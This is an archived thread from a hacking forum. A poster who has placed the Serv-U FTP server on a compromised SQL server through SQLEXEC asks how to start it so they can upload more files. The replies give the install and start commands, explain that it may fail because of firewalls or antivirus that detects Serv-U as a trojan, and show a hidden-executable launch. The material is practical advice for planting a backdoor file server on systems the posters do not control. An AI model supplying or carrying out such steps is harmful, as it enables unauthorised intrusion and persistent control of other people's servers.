hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Sql Problems
arun0075
how to execute files on sql... I have uploaded the serv-u on sql by using echo and now i want to start sql i am using sqlexec i tried the following commad

1> start c:\winnt\system32\serv-u.exe

2> c:\windows\system32\serv-u.exe /i

3> net start serv-u.exe

i tried all these commad using SQLEXEC but the ftp is not starting and my SQLExEC is getting hanged why is this

CAN sum1 please tell me how to start ftp or is there any way i can echo a bat file and start serv-u through bat file

I am very new to SQL so u need to bare me lol but i am really curious to start ftp on SQL so that i can upload more files smile.gif please advice and help
sylver
what version do u use on the sql
for 2.5:
start c:\temp\test /i /h test.ini
4.1:
c:\temp\test /i
net start test-u ^^
then sqlexec hangs-thats normal!
Leonnetje
First you need to install the serv-u by the following command:
CODE

c:\DIR\DIR\serv-u.exe /i


After that you'll start it by typing this:
CODE

net start serv-u


If it's NOT starting, then they're is already a service running and then the host you're on is already hacked, so leave it alone......
EXPLOiTED
c:\hidden.exe c:\servu.exe

theres a example
DumpZ
if net start serv-u doens't work try to install serv-u by

CODE

serv-u.exe /i
serv-u.exe /h
net start serv-u


This is how i always install and start my files, never had any trouble with it.

Good Luck
B1G
or probably there is another servu running

or the port you are using is blocked by a firewall
guufa
Try those differents methods:

serv-u /i
serv-u /h
net start serv-u

And then if its dont work :
1) You have maked a mistake in u .ini .
2) There is a FW.
3) There is an AV (Norton detect Serv-u as a trojan).

make a net start to view if there are an AV or a FW.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.